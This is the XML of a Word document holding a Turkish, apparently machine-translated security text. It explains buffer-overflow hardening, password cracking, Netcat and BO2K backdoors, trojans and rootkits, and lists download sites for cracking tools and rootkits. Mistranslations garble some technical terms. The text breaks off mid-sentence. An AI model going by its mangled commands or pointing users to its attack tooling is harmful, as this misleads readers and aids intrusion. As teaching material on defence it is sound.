    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="003034AC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>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Arabellek aşırı yük saldırılarına karşı en kapsamlı savunma yazılımı düzgün bir şekilde kodlamaktır, böylece yığını parçalamak için kullanılamaz. Tüm programlar, kullanıcılardan ve diğer programlardan gelen tüm girdileri doğrulamalı ve ayrılan bellek yapılarına girmesini sağlamalıdır. Her bir değişken kontrol edilmeli (kullanıcı girişi, diğer fonksiyonlardan değişkenler, diğer programlardan giriş ve hatta ortam değişkenleri dahil), atanan tamponların verileri tutmak için yeterli olduğundan emin olmak için. Ne yazık ki, bu nihai çözüm yalnızca programları yazan ve kaynak kodu olan kişiler için geçerlidi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Ek olarak, güvenlik pratisyenleri ve sistem yöneticileri, kullanıcıların çalıştırabileceği ve diğer kullanıcıların (root gibi) izinlerine sahip olabilecekleri bir sistemdeki SUID programlarının sayısını dikkatlice kontrol etmeli ve en aza indirmelidir. Hassas sistemlere yalnızca açık bir iş gereksinimi olan SUID programları yüklenmelid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Son olarak, birçok yığın tabanlı arabellek taşma saldırısı, sistemleri yığından kod çalıştırmamaya zorlayarak önyüklenebilir. Özellikle, Solaris ve Linux bu seçeneği sunar. Örneğin, Solaris sistemini yığın tabanlı arabelleklere karşı aşılamak için, aşağıdaki satırlar eklenmelid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etc/system:</w:t>
      </w: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set noexec_user_stack=1 set noexec_user_stack_log=1</w:t>
      </w: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rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003034AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>İlk satır bir istif üzerinde çalışmayı önler ve ikinci satır herhangi bir girişimi kaydeder. Ne yazık ki, bazı programlar yasal olarak yığından kod çalıştırmaya çalışır. Bu seçenek uygulanırsa bu programlar çökecektir. Genel olarak, sistem tek bir amaç ise ve güvenli olması gerekiyorsa (örneğin bir Web sunucusu), bu seçenek yığın tabanlı arabellek akışını önlemek için kullanılmalıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="003034AC"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rsidRPr="003034AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Parola Kırma Sanatı ve Bilimi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="003034AC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>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Günümüzde sistemlerin büyük çoğunluğu, kullanıcıları statik bir parola ile doğrulamaktadır. Bir kullanıcı oturum açtığında, sisteme şifre gönderilir ve bu, kullanıcının giriş yapmasına izin verip vermemeye karar vermek için şifreyi kontrol eder. Bu kararı verebilmek için sistemin, kullanıcının girişini gerçek şifre ile karşılaştıracak bir mekanizmasına sahip olması gerekir. . Elbette, sistem sadece tüm şifreleri yerel olarak depolayabilir ve bu dosyadan karşılaştırabilir. Bununla birlikte, bu tür bir açık metin şifresi, bir saldırgan için çok sulu bir hedef sağlayacaktır. Hedefi saldırganlar için daha az kullanışlı hale getirmek için, çoğu modern işletim sistemi saklanan şifreleri korumak için tek yönlü bir karma veya şifreleme mekanizması kullanır. Bir kullanıcı bir parola yazdığında, sistem kullanıcının girişini sağlar ve bunu saklanan karma ile karşılaştırır. İki karma eşleşirse, şifre doğrudur ve kullanıcı giriş yapabil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 xml:space="preserve">Parola kırma araçları, bu parola koruma yöntemine saldırmak için kullanılır. Bir saldırgan şifreli veya şifreli şifreyi bir sistemden toplamak için bazı istismarlar (genellikle üzerlerinde bir </w:t>
      </w:r>
      <w:r w:rsidRPr="003034AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>tampon) kullanır (şifre gölgelemeden bir UNIX sisteminde, herhangi bir kullanıcı şifreli şifreyi okuyabilir). Şifreli şifreyi indirdikten sonra, saldırgan kullanıcıların şifrelerini belirlemek için bir şifre kırma aracı kullanır. Kırma aracı bir döngü kullanarak çalışır: bir parola tahmin eder, parolayı özetler veya şifreler ve çalınan alandaki karma parola ile karşılaştırır. Karma eşleşirse, saldırganın şifresi vardır. Karma eşleşmiyorsa, döngü başka bir şifre tahminiyle tekrar başla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Parola kırma araçları, parola tahminlerini bir sözlük veya tam bir kaba kuvvet saldırısına dayanarak her olası parolayı dener. İngilizce, Fransızca, Almanca, Klingon, vb. Birçok dilde online olarak sözlükler mevcuttu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Çok sayıda şifre kırma aracı mevcut. En popüler ve tam işlevli şifre kırıcılar şunlardı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 xml:space="preserve">• Solar Designer tarafından hazırlanan Ripper John, UNIX şifrelerini kırmaya odaklanıyor ve </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color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">http: // www.openwall.com/john/ adresinde bulunabilir. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="003034AC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003034AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>• Windows NT şifrelerini kırmak için kullanılan L0phtCrack, http://www.l0pht.com adresinde bulunabili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Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="003034AC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003034AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Şifre Kırma Savunması</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br/>
      </w:r>
      <w:r w:rsidRPr="003034AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Parola kırmaya karşı ilk savunma, şifreli / şifreli parolanın maruz kalmasını en aza indirmekten. UNIX sistemlerinde, sadece süper şifreli şifreyi okuyor. Windows NT sistemlerinde, NT 4.0 SP3 ve sonraki sürümlerinde bulunan SYSKEY özelliği mevcut ve etkin durumda. Ayrıca, tüm yedeklemeler ve sistem güvenliği diskleri fiziksel olarak güvenlidir saklanmalı ve hatta şifrelenmişt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Güvenli bir şifre politikası, güvenli bir ağın sağlanmasında çok önemli bir unsurdur. Bir şifre politikası, sekiz karakterden daha uzun şifre uzunlukları, her şifrede alfanümerik ve özel karakterlerin kullanılmasını gerektirir ve kullanıcıları karma harfli şifrelere sahip olmaya zorlar. Kullanıcıların zayıf şifreler sorununun farkında olmaları ve akılda kalıcı ancak farklı tahmin edilebilecek şifreler oluşturma konusunda eğitilmeleri gerek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Parolaların güvenli olmasını sağlamak ve zayıf parolaları belirlemek için, güvenlik uzmanları parola kırma araçları kullanarak sistem parolalarını düzenli aralıklarla denetlemelidir. Zayıf şifreler keşfedildiğinde, güvenlik grubu, şifreleri kolayca tahmin edilebilecek kullanıcılarla etkileşime geçmek için belirlenmiş bir prosedür olmalıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="003034AC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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on olarak, kullanıcıların şifrelerini kolayca tahmin edilebilecek değerlere ayarlamasını önleyen çeşitli yazılım paketleri mevcuttur. Bir kullanıcı yeni bir şifre belirlediğinde, bu filtreleme programları tamamen karmaşık olduğundan emin olmak için şifreyi kontrol eder ve sadece kullanıcı adının veya sözlük kelimesinin bir çeşitlemesi değildir. Bu tür bir araçla, kullanıcılar kolayca önemli bir güvenlik sorununu ortadan kaldıran, kolayca tahmin edilebilecek şifreler oluşturamazlar. Filtreleme yazılımının etkili olması için, kullanıcıların UNIX sunucuları, Windows NT Birincil ve Yedek Etki Alanı Denetleyicileri ve Novell sunucuları dahil olmak üzere şifreler oluşturduğu tüm sunuculara kurulmaları gerekir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>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sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003034AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Arka</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003034AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>kapılar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>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Arka kapılar, sistemdeki geleneksel güvenlik kontrollerini atlayan, saldırganın bir sistem şifresi sağlamadan ve giriş yapmadan makineye erişmesini sağlayan programlardır. Saldırganlar, daha sonra sisteme erişebilmelerini sağlamak için makineye arkaya monte eder (veya kullanıcıyı kendilerine takmaya zorlar). Kurulduktan sonra, çoğu arka kapı saldırgandan ağ üzerinden gelen bağlantılar için özel bağlantı noktalarını dinler. Saldırgan arka kapı dinleyicisine bağlandığında, geleneksel kullanıcı kimliği ve parola ya da diğer kimlik doğrulama biçimleri atlanır. Bunun yerine, saldırgan şifre girmeden veya yalnızca arka kapıya girmek için kullanılan özel bir şifre kullanarak sisteme erişebili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xml:space="preserve">Netcat, Hobbit tarafından UNIX ve Weld Pond tarafından Windows NT için yazılmış inanılmaz esnek bir araçtır (her iki sürüm de http: // www. L0pht.com/~weld/netcat/ adresinde bulunabilir). Çok sayıdaki diğer kullanımları arasında, Netcat, herhangi bir TCP veya UDP bağlantı noktasında süper kullanıcı düzeyinde bir kabuğa sahip bir arka kapı dinleyicisi oluşturmak için kullanılabilir. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
        </w:rPr>
        <w:t>Windows sistemlerinde, Back Oriﬁ</w:t>
      </w:r>
      <w:r w:rsidRPr="003034AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
        </w:rPr>
        <w:t>ce 2000 (kısa olarak BO2K olarak adlandırılan ve http://www.bo2k.com adresinde bulunabilir) ve http://www.bo2k.com adresinde bulunabilir) dahil olmak üzere çok sayıda arka kapı uygulaması mevcuttur. http://www.hack-atack.com).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005F0942"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rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003034AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Arka kapı savunması</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="003034AC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>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Arka kapı programlarına karşı en iyi savunma, sistem ve güvenlik yöneticilerinin makinelerinde nelerin çalıştığını bilmesi, özellikle kritik bilgileri depolayan veya yüksek değerli işlemleri gerçekleştiren hassas sistemlerdir. Birdenbire bağlantı noktasını dinleyen süper kullanıcı olarak çalışan bir işlem görüldüğünde yöneticinin araştırması gerekir. UNIX ve Windows NT sistemlerinde netstat –na komutunu kullanarak çeşitli portlarda dinleyen arka kapılar keşfedilebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="003034AC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>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Ek olarak, birçok arka kapı programı (BO2K gibi), tüm kullanıcıların masaüstlerine ve bir kuruluştaki sunuculara yüklenmesi gereken bir virüsten koruma programı tarafından keşfedilebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:b/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="003034AC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003034AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Truva Atları ve Kök Kitleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="003034AC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>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aldırganın en büyük aracının en önemli unsurlarından biri Truva atı programıdır. Antik Yunanistan'ın Truva atı gibi, bu yeni Truva atlarının da bazı yararlı işlevleri var gibi görünmektedir, ancak gerçekte bazı kötü niyetli faaliyetleri gizlemektedir. Örneğin, bir kullanıcı elektronik posta ile çalıştırılabilir bir doğum günü kartı programı alabilir. Şüpheli olmayan kullanıcı doğum günü kartı programını etkinleştirdiğinde ve doğum günü pastalarının ekran boyunca dans etmesini izlerken, program gizlice bir arka kapı kurar veya kullanıcıların sabit diskini siler. Bu örnekte gösterildiği gibi, Truva atları aldatmacaya güveniyorlar - bir kullanıcıyı veya sistem yöneticisini (görünür) kullanışlılıkları için çalıştırmaları için kandırıyorlar, ancak asıl amacı kullanıcının makinesine saldırmak.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="003034AC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003034AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Geleneksel Truva Atları</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="003034AC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003034AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Geleneksel bir Truva atı sadece bir kullanıcı veya yönetici tarafından çalıştırılabilen bağımsız bir programdır. Aşağıdakiler de dahil olmak üzere sayısız geleneksel Truva atı programı geliştirilmiştir:</w:t>
      </w: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xml:space="preserve">• Bilinen doğum günü kartı veya tatil tebrik e-posta eki yukarıda açıklanmıştır. </w:t>
      </w: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Bir CD-ROM okuyucularını CD yazma aygıtlarına dönüştürebildiğini iddia eden yazılım programı. Her ne kadar bu başarının yazılımda gerçekleştirilmesi imkansız olsa da, birçok kullanıcı bu "aracı" nı indirmeye başladı.</w:t>
      </w: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Bir Güvenlik açığı tarayıcı, WinSATAN. Bu araç, bir Windows NT sistemi kullanan sistem ve güvenlik yöneticileri için uygun bir güvenlik açığı taraması sağladığını iddia ediyor. Ne yazık ki, bu programı çalıştıran şüphesiz bir kullanıcı da silinmiş bir sabit sürücüye sahip olacaktır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="003034AC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>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Sayısız başka örnekler var. Kavramsal olarak çekici olmasa da, kullanıcılar dikkatli olmazsa ve makinelerinde güvenilmeyen programlar çalıştırırsa geleneksel Truva atları büyük bir sorun olabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:b/>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sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003034AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Rootkitleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:b/>
          <w:color w:val="212121"/>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Bir RootKit, bir Truva atı kavramını çok daha güçlü bir seviyeye taşır. Ad başka türlü ima etse de, RootKits bir saldırganın bir sisteme "root" (süper kullanıcı) erişimi kazanmasına izin vermez. Bunun yerine, RootKits, zaten bir yönetici tarafından işgalin tespitini denemek için tüm girişimleri engelleyerek bu erişimi korumak için zaten süper kullanıcı erişimine sahip bir saldırgana izin verir. RootKits, kritik sistem programlarını değiştiren veya yama alan tüm Truva atı programlarından oluşur. Yöneticilerin makinelerindeki saldırganları tespit etmek için kullandıkları çeşitli araçlar RootKits ile rutin olarak baltalanı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Çoğu RootKits, bir Truva atı arka kapı programı içerir (UNIX'te / bin / login yordamı). Saldırgan, önceki sürümün üzerine yazarak / bin / login adında yeni bir Truva atı sürümü yükleyecektir. RootKit / bin / login rutini, saldırganın sisteme daha sonra erişebilmesi için özel bir arka kapı kullanıcı kimliği ve şifresi içer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Ek olarak, RootKits bir sniffer ve snifferin gizlenmesi için bir program içerir. Yönetici ifcon komutunu çalıştırarak sistemdeki bir algılayıcıyı algılayabilir. Eğer bir sniffer çalışıyorsa, ifcon çıkışı PROMISC contain ag içerecektir, bunun anlamı Ethernet kartının proiscu modda olduğunu ve bu nedenle de bittiğini gösterir. RootKit, bir saldırganın tespit edilmesini önleyen, PROMISC jan ag göstermeyen bir ifcon Tro g Truva atı sürümü içerir.</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r w:rsidRPr="003034AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003034AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>UNIX tabanlı RootKits ayrıca ps ve du dahil olmak üzere diğer kritik sistem çalıştırılabilirlerinin yerini alıyor. Hangi işlemlerin çalıştığını belirlemek için kullanıcılar ve yöneticiler tarafından verilen ps komutu, bir saldırganın işlemleri gizleyebilmesi için değiştirilir. Disk kullanımını gösteren du komutu, RootKit ve saldırganın diğer programlarının kapladığı alanın maskelenebilmesi için değiştirildi.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="003034AC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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Bin / login, ifcon ps g, ps, du ve diğerleri gibi programları değiştirerek, bu RootKit araçları işletim sisteminin kendisinin bir parçası haline gelir. Bu nedenle RootKits, bir yöneticinin gözlerini ve kulaklarını kapatmak için kullanılır. Bilgisayarda sistem yöneticisine iyi görünen sanal bir dünya yaratırlar; gerçekte bir saldırgan oturum açabilir ve cezasız bir şekilde sistemde dolaşabilir. RootKits, çoğu UNIX sistemi ve Windows NT için geliştirilmiştir. Çok çeşitli UNIX RootKits http://packetstorm.securify.com/UNIX/penetration/rootkits adresinde bulunurken, NT RootKit http://www.rootkit.com adresinde bulunabili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u alanda son zamanlardaki bir gelişme, çekirdek düzeyinde RootKits’in piyasaya sürülmesidir. Bu RootKits, bir işletim sisteminin en temel seviyelerinde hareket eder. / Bin / login ve ifcon application g gibi uygulama programlarını değiştirmek yerine, çekirdek seviyesindeki RootKits aslında sisteme çok düşük seviyeli erişim sağlamak için çekirdeği yatar. Bu araçlar, Linux ve Solaris dahil olmak üzere birçok yeni UNIX varyantının desteklediği yüklenebilir çekirdek modüllerine dayanmaktadır. Yüklenebilir çekirdek modülleri, bir yöneticinin sistemi yeniden başlatmadan bile çekirdeğe işlevsellik eklemesini sağlar. Süper kullanıcı erişimine sahip bir saldırgan, programların yürütülmesine yeniden izin verecek bir çekirdek düzeyinde RootKit yükleyebili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ir yönetici bir programı çalıştırmaya çalıştığında, Truva atı çekirdeği, yürütme isteğini saldırganın programına gönderir; bu, erişim veya başka bir Truva atı sunan bir arka kapı olabilir. Çekirdek yürütme isteklerinin yeniden yapılmasını sağladığından, bu tür bir etkinliği tespit etmek çok güçtür. Yönetici yeniden ele geçirilen dosyaya bakmaya veya bütünlüğünü kontrol etmeye çalışırsa, programın görüntüsü değiştirilmediğinden program değişmemiş görünecektir. Bununla birlikte, yürütüldüğünde, değiştirilmemiş program atlanır ve kötü niyetli bir program çekirdek yerine kullanılır. Creed tarafından yazılan Knark, 